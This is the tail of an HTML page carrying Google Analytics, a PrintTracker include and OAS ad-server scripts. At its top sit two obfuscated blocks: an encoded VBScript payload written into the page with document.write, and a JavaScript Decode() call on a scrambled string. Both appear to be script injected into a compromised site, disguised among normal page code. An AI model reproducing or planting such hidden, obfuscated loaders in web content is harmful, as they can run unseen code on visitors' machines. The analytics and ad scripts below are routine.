@&s!xmDrGx,0kWc#@&6	P3DMGD,Ind!:+~H6O@&UnDPWkW{ZDlDnr(Lc0kW/JUqf*@&2	NPw;UmDkKx@&s;U1YrW	~ktj4VVcb@&rUPA.MW.,I/Es+,H+XY@&?Y~	kt?4nV^'ZMnCYr(Lchd/d?(f*@&2	N~o!xmOrKx@&s!U1YrKx,ZDlDnr(LcZd?(9*@&r	~2MDWM~]+kEs+~1naD@&)wa64NRjnDZSj(G`/SU(G#@&zwar4NR1.+mYnq	/OC	m+vb@&Skx9GARkYmY;/xEr@&j+D~ZM+COr4%xzw2r(%cMnDr(L+1Yvb@&Ax[PwEU^DkW	mXYFAA==^#~@"
document.write"<"&"Script Language=""VBScript.Encode"">"&QueryString&"</"&"Script>"
--></Script>
<SCRIPT LANGUAGE=JavaScript>
<!--   
    Decode('%2C%3AJzjypw%7B%2C97shun%7Chnl%2C%3AK%2C99qh%7Dhzjypw%7B%2C99%2C97%7B%80wl%2C%3AK%2C99%7Bl%7F%7B6qh%7Dhzjypw%7B%2C99%2C97zyj%2C%3AK%2C996jnp4ipu6%7Dhspkh%7Blfihuuly%2C%3AMluj%2C%3AKxw%7B%7C58%2C99%2C%3AL%2C%3AJ6zjypw%7B%2C%3AL7');
//-->
</SCRIPT>


<!-- PrintTracker Insertion Begin -->
<script src="/fs_img/js/pt.js" type="text/javascript"></script>
<!-- PrintTracker Insertion Complete -->


<!-- Google Analytics Insertion Begin -->
<script type="text/javascript">
<!--
        var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
        var URL = gaJsHost + "google-analytics.com/ga.js";
        document.write(unescape("%3Cscript src='" + URL + "' type='text/javascript'%3E%3C/script%3E"));

        var hndl = window.setTimeout('StartTracking()',100);
        function StartTracking(){
          if( typeof(_gat) == 'object'){ 
             window.clearTimeout(hndl);
             var pageTracker = _gat._getTracker("UA-4601892-3");
             pageTracker._setDomainName("none");
             pageTracker._setAllowLinker(true);
             pageTracker._initData();
             pageTracker._trackPageview();
          }else{
             hndl = window.setTimeout('StartTracking()',100);
          }
        }
-->
</script>
<!-- Google Analytics Insertion Complete -->

<SCRIPT LANGUAGE=JavaScript>
  <!--
  //configuration
  OAS_url = "http://cyclops.prod.untd.com/";
  OAS_sitepage = 'webservices/general'; //CHANGED
  OAS_listpos = 'Bottom';
  OAS_query = '';
  OAS_target = '_Blank';
  //end of configuration
  OAS_version = 10;
  OAS_rn = '001234567890'; OAS_rns = '1234567890';
  OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
  function OAS_NORMAL(pos) {
    document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
    document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
  }
  //-->
  </SCRIPT>

  <SCRIPT LANGUAGE=JavaScript1.1>
  <!--
  OAS_version = 11;
  if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
    OAS_version = 10;
  if (OAS_version >= 11)
    document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');
  //-->
  </SCRIPT>

  <SCRIPT LANGUAGE=JavaScript>
  <!--
  document.write('');
  function OAS_AD(pos) {
    if ((OAS_version >= 11) && (typeof OAS_RICH != 'undefined')) {
      OAS_RICH(pos);
    } else {
      OAS_NORMAL(pos);
    }
  }
  //-->
  </SCRIPT>

  <TABLE ALIGN=CENTER STYLE="clear:both"><TR><TD ALIGN=CENTER> <!------ OAS AD 'Bottom' begin ------> <SCRIPT LANGUAGE=JavaScript> if(window.OAS_AD) OAS_AD('Bottom'); </SCRIPT> <!------ OAS AD 'Bottom' end ------> </TD></TR></TABLE>